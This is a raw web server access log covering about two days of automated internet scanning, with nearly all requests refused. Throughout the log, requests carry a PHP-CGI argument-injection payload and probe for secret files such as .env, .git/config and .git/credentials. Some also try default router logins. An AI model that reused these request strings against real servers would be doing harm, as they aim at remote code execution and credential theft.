194.50.16.253 - - [24/Mar/2026:23:40:44 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [24/Mar/2026:23:55:49 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
66.132.224.93 - - [25/Mar/2026:00:00:55 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.224.93 - - [25/Mar/2026:00:01:48 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:00:03:05 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
213.176.18.65 - - [25/Mar/2026:00:04:47 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
213.176.18.65 - - [25/Mar/2026:00:04:47 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
213.176.18.65 - - [25/Mar/2026:00:04:55 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:01:03:00 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.53.99 - - [25/Mar/2026:01:07:17 +0200] "GET /login.asp HTTP/1.1" 404 9 "{}"
176.65.149.253 - - [25/Mar/2026:01:16:05 +0200] "GET /.streamlit/secrets.toml HTTP/1.0" 404 9 "{}"
91.200.102.173 - - [25/Mar/2026:01:29:25 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
91.200.102.173 - - [25/Mar/2026:01:29:26 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
77.83.39.82 - - [25/Mar/2026:01:35:28 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
77.83.39.82 - - [25/Mar/2026:01:40:30 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.208 - - [25/Mar/2026:01:40:37 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
66.132.172.103 - - [25/Mar/2026:01:53:52 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.103 - - [25/Mar/2026:01:53:53 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.103 - - [25/Mar/2026:01:54:34 +0200] "GET /security.txt HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:02:04:09 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:02:11:45 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
165.154.252.214 - - [25/Mar/2026:02:15:30 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
165.154.252.214 - - [25/Mar/2026:02:15:30 +0200] "POST / HTTP/1.1" 400 11 "{}"
165.154.252.214 - - [25/Mar/2026:02:15:30 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
165.154.252.214 - - [25/Mar/2026:02:15:31 +0200] "POST / HTTP/1.1" 400 11 "{}"
65.49.1.152 - - [25/Mar/2026:02:16:42 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.152 - - [25/Mar/2026:02:31:37 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
139.59.58.140 - - [25/Mar/2026:02:56:50 +0200] "GET /aaa9 HTTP/1.1" 404 9 "{}"
139.59.58.140 - - [25/Mar/2026:02:56:54 +0200] "GET /aab8 HTTP/1.1" 404 9 "{}"
137.184.30.187 - - [25/Mar/2026:03:01:38 +0200] "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1" 404 9 "{}"
137.184.30.187 - - [25/Mar/2026:03:01:39 +0200] "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:03:03:28 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
118.194.250.22 - - [25/Mar/2026:03:12:49 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
118.194.250.22 - - [25/Mar/2026:03:12:50 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:03:16:02 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.208 - - [25/Mar/2026:03:28:17 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
91.230.168.53 - - [25/Mar/2026:03:43:09 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [25/Mar/2026:03:58:09 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:04:04:10 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
65.49.1.196 - - [25/Mar/2026:04:32:08 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.192 - - [25/Mar/2026:04:33:29 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:05:04:12 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:42 +0200] "GET /dns-query?dns=AgUBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:42 +0200] "POST /dns-query HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:42 +0200] "GET /dns-query?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:42 +0200] "GET /dns-query?dns=sgUBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:42 +0200] "POST /dns-query HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:43 +0200] "GET /dns-query?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:43 +0200] "GET /query?dns=awYBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:43 +0200] "POST /query HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:43 +0200] "GET /query?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:43 +0200] "GET /query?dns=x0YBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:44 +0200] "POST /query HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:44 +0200] "GET /query?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:44 +0200] "GET /resolve?dns=p9gBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:44 +0200] "POST /resolve HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:44 +0200] "GET /resolve?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:45 +0200] "GET /resolve?dns=vPQBAAABAAAAAAAAATEEb2RucwFtCmRuc21lYXN1cmUDdG9wAAABAAE HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:45 +0200] "POST /resolve HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:45 +0200] "GET /resolve?name=1.odns.m.dnsmeasure.top&type=A HTTP/1.1" 404 9 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:45 +0200] "POST / HTTP/1.1" 400 11 "{}"
47.245.117.221 - - [25/Mar/2026:05:20:46 +0200] "POST / HTTP/1.1" 400 11 "{}"
185.247.137.242 - - [25/Mar/2026:05:22:55 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
159.65.219.252 - - [25/Mar/2026:05:22:56 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
195.178.110.162 - - [25/Mar/2026:05:50:06 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
20.127.157.56 - - [25/Mar/2026:05:51:01 +0200] "GET /login HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:06:04:48 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
14.225.18.21 - - [25/Mar/2026:06:19:17 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
14.225.18.21 - - [25/Mar/2026:06:19:18 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
14.225.18.21 - - [25/Mar/2026:06:19:48 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:07:03:53 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
85.217.140.48 - - [25/Mar/2026:07:47:34 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
85.217.140.48 - - [25/Mar/2026:07:47:35 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
85.217.140.48 - - [25/Mar/2026:07:47:35 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:07:48:43 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [25/Mar/2026:07:50:16 +0200] "POST /_next HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [25/Mar/2026:07:50:21 +0200] "POST /api HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [25/Mar/2026:07:50:25 +0200] "POST /_next/server HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [25/Mar/2026:07:50:30 +0200] "POST /app HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [25/Mar/2026:07:50:34 +0200] "POST /api/route HTTP/1.1" 404 9 "{}"
135.237.124.61 - - [25/Mar/2026:07:52:42 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
206.168.201.212 - - [25/Mar/2026:08:09:14 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 9 "{}"
87.121.84.56 - - [25/Mar/2026:08:25:05 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
45.144.212.97 - - [25/Mar/2026:08:27:28 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:08:33:22 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
172.94.9.253 - - [25/Mar/2026:08:47:36 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:08:49:10 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
135.237.127.54 - - [25/Mar/2026:08:55:00 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:09:31:35 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
15.204.34.10 - - [25/Mar/2026:09:40:56 +0200] "GET /blog-verify HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:09:50:01 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:09:54:34 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:10:31:33 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:10:33:53 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:10:49:36 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
119.28.133.29 - - [25/Mar/2026:11:16:11 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
119.28.133.29 - - [25/Mar/2026:11:16:12 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
119.28.133.29 - - [25/Mar/2026:11:16:26 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
106.13.224.150 - - [25/Mar/2026:11:26:56 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
106.13.224.150 - - [25/Mar/2026:11:26:56 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
106.13.224.150 - - [25/Mar/2026:11:27:06 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:11:31:56 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
46.151.178.11 - - [25/Mar/2026:11:42:20 +0200] "GET /api/sonicos/is-sslvpn-enabled HTTP/1.0" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:11:51:50 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:12:29:26 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [25/Mar/2026:12:29:40 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
104.28.106.147 - - [25/Mar/2026:12:35:01 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 16 "{}"
104.28.106.147 - - [25/Mar/2026:12:35:01 +0200] "GET /favicon.ico HTTP/1.1" 404 16 "{}"
104.28.106.147 - - [25/Mar/2026:12:35:01 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 16 "{}"
104.28.106.147 - - [25/Mar/2026:12:35:01 +0200] "GET /apple-touch-icon.png HTTP/1.1" 404 16 "{}"
176.65.149.253 - - [25/Mar/2026:12:44:24 +0200] "GET /.env HTTP/1.0" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:12:51:25 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
109.105.210.100 - - [25/Mar/2026:12:55:25 +0200] "GET /login/login HTTP/1.1" 404 9 "{}"
42.48.38.189 - - [25/Mar/2026:12:59:15 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
43.248.109.53 - - [25/Mar/2026:12:59:16 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
185.12.59.118 - - [25/Mar/2026:13:23:47 +0200] "GET /Dr0v HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:13:27:59 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [25/Mar/2026:13:37:31 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:13:42:12 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:13:51:49 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.156.73.73 - - [25/Mar/2026:14:04:38 +0200] "GET /api/sonicos/is-sslvpn-enabled HTTP/1.0" 404 9 "{}"
195.178.110.109 - - [25/Mar/2026:14:26:55 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
195.178.110.109 - - [25/Mar/2026:14:26:55 +0200] "GET /?get=login HTTP/1.1" 401 12 "{}"
91.224.92.125 - - [25/Mar/2026:14:50:46 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:14:51:36 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
195.178.110.246 - - [25/Mar/2026:15:04:23 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
112.248.82.68 - - [25/Mar/2026:15:10:38 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:15:12:51 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.189.143.113 - - [25/Mar/2026:15:20:04 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
5.189.143.113 - - [25/Mar/2026:15:20:04 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
5.189.143.113 - - [25/Mar/2026:15:20:07 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
185.198.240.71 - - [25/Mar/2026:15:27:17 +0200] "GET /wp-includes/css/buttons.css HTTP/1.1" 404 9 "{}"
135.237.125.146 - - [25/Mar/2026:15:36:14 +0200] "GET /manager/text/list HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:15:52:57 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [25/Mar/2026:16:53:14 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:16:53:46 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.208 - - [25/Mar/2026:16:54:03 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:17:55:31 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
45.9.168.192 - - [25/Mar/2026:18:20:34 +0200] "GET /eventmanager HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [25/Mar/2026:18:31:17 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [25/Mar/2026:18:31:17 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [25/Mar/2026:18:40:56 +0200] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [25/Mar/2026:18:40:56 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [25/Mar/2026:18:40:56 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [25/Mar/2026:18:40:57 +0200] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [25/Mar/2026:18:40:57 +0200] "POST /boaform/formTracert HTTP/1.1" 404 9 "{}"
35.246.197.59 - - [25/Mar/2026:18:41:56 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.197.59 - - [25/Mar/2026:18:41:56 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:18:56:16 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
135.237.81.94 - - [25/Mar/2026:19:07:59 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
195.178.110.162 - - [25/Mar/2026:19:10:24 +0200] "GET /.git/credentials HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [25/Mar/2026:19:19:19 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
194.163.183.223 - - [25/Mar/2026:19:37:48 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
194.163.183.223 - - [25/Mar/2026:19:37:48 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
194.163.183.223 - - [25/Mar/2026:19:37:59 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
45.144.212.97 - - [25/Mar/2026:19:39:38 +0200] "GET /.git/credentials HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:19:55:50 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
3.83.33.30 - - [25/Mar/2026:19:59:29 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
81.70.79.147 - - [25/Mar/2026:20:13:25 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
81.70.79.147 - - [25/Mar/2026:20:13:26 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
81.70.79.147 - - [25/Mar/2026:20:14:00 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
106.75.189.197 - - [25/Mar/2026:20:53:51 +0200] "GET /dqgqoeCXckuwPtxov HTTP/1.1" 404 9 "{}"
106.75.189.197 - - [25/Mar/2026:20:53:52 +0200] "GET /dqgqoeCXckuwPtxov HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:20:56:57 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
81.29.142.6 - - [25/Mar/2026:20:57:31 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
81.29.142.6 - - [25/Mar/2026:20:57:33 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
81.29.142.6 - - [25/Mar/2026:20:57:34 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
194.164.107.6 - - [25/Mar/2026:21:00:21 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [25/Mar/2026:21:03:56 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
176.65.149.253 - - [25/Mar/2026:21:08:16 +0200] "GET /config.json HTTP/1.0" 404 9 "{}"
43.157.22.109 - - [25/Mar/2026:21:12:53 +0200] "GET /?get=login HTTP/1.1" 401 12 "{}"
98.89.4.128 - - [25/Mar/2026:21:39:59 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
98.89.4.128 - - [25/Mar/2026:21:39:59 +0200] "GET /favicon.png HTTP/1.1" 404 9 "{}"
98.89.4.128 - - [25/Mar/2026:21:39:59 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
98.80.101.11 - - [25/Mar/2026:21:52:41 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
98.80.101.11 - - [25/Mar/2026:21:52:41 +0200] "GET /favicon.png HTTP/1.1" 404 9 "{}"
98.80.101.11 - - [25/Mar/2026:21:52:41 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:21:55:40 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
43.155.195.141 - - [25/Mar/2026:22:33:01 +0200] "GET /?get=login HTTP/1.1" 401 12 "{}"
5.61.209.107 - - [25/Mar/2026:22:55:34 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
45.156.128.126 - - [25/Mar/2026:22:58:57 +0200] "GET /login/login HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [25/Mar/2026:23:54:20 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
40.119.24.130 - - [26/Mar/2026:00:00:19 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 9 "{}"
52.186.182.60 - - [26/Mar/2026:00:08:09 +0200] "GET /manager/html HTTP/1.1" 404 9 "{}"
115.191.62.17 - - [26/Mar/2026:00:19:43 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
115.191.62.17 - - [26/Mar/2026:00:19:47 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
115.191.62.17 - - [26/Mar/2026:00:20:09 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
195.178.110.246 - - [26/Mar/2026:00:30:45 +0200] "GET /.git/credentials HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:00:54:42 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
66.132.186.162 - - [26/Mar/2026:00:56:21 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.186.162 - - [26/Mar/2026:00:58:31 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:01:18:55 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [26/Mar/2026:01:25:14 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:01:27:43 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:01:53:43 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
172.94.9.253 - - [26/Mar/2026:01:54:27 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
185.242.3.64 - - [26/Mar/2026:02:15:51 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 9 "{}"
118.26.37.105 - - [26/Mar/2026:02:22:04 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
118.26.37.105 - - [26/Mar/2026:02:22:05 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
118.26.37.105 - - [26/Mar/2026:02:22:06 +0200] "GET /config.json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:02:31:42 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
85.208.48.192 - - [26/Mar/2026:02:31:45 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
85.208.48.192 - - [26/Mar/2026:02:31:45 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
85.208.48.192 - - [26/Mar/2026:02:31:58 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:02:55:28 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [26/Mar/2026:02:55:32 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [26/Mar/2026:02:55:34 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.197 - - [26/Mar/2026:02:56:30 +0200] "GET /wiki HTTP/1.1" 404 9 "{}"
74.7.227.33 - - [26/Mar/2026:03:38:47 +0200] "GET /?get=login HTTP/1.1" 401 12 "{}"
5.61.209.107 - - [26/Mar/2026:03:55:04 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
194.187.176.162 - - [26/Mar/2026:04:08:01 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
85.217.140.39 - - [26/Mar/2026:04:38:08 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
85.217.140.39 - - [26/Mar/2026:04:38:08 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
85.217.140.39 - - [26/Mar/2026:04:38:09 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:04:54:12 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [26/Mar/2026:05:24:52 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
152.32.128.85 - - [26/Mar/2026:05:35:53 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
152.32.128.85 - - [26/Mar/2026:05:35:53 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:05:54:27 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
204.76.203.25 - - [26/Mar/2026:06:21:45 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
45.156.128.96 - - [26/Mar/2026:06:34:06 +0200] "POST /mcp HTTP/1.1" 404 9 "{}"
45.156.128.96 - - [26/Mar/2026:06:34:06 +0200] "GET /sse HTTP/1.1" 404 9 "{}"
45.156.128.99 - - [26/Mar/2026:06:34:06 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
74.82.47.3 - - [26/Mar/2026:06:48:27 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
74.82.47.3 - - [26/Mar/2026:06:50:06 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
195.178.110.190 - - [26/Mar/2026:06:51:32 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:06:53:35 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
184.105.247.195 - - [26/Mar/2026:07:04:16 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
184.105.247.195 - - [26/Mar/2026:07:15:08 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
37.252.184.212 - - [26/Mar/2026:07:23:23 +0200] "GET //favicon.ico?0 HTTP/1.1" 404 9 "{}"
165.154.104.235 - - [26/Mar/2026:07:47:56 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
165.154.104.235 - - [26/Mar/2026:07:47:58 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
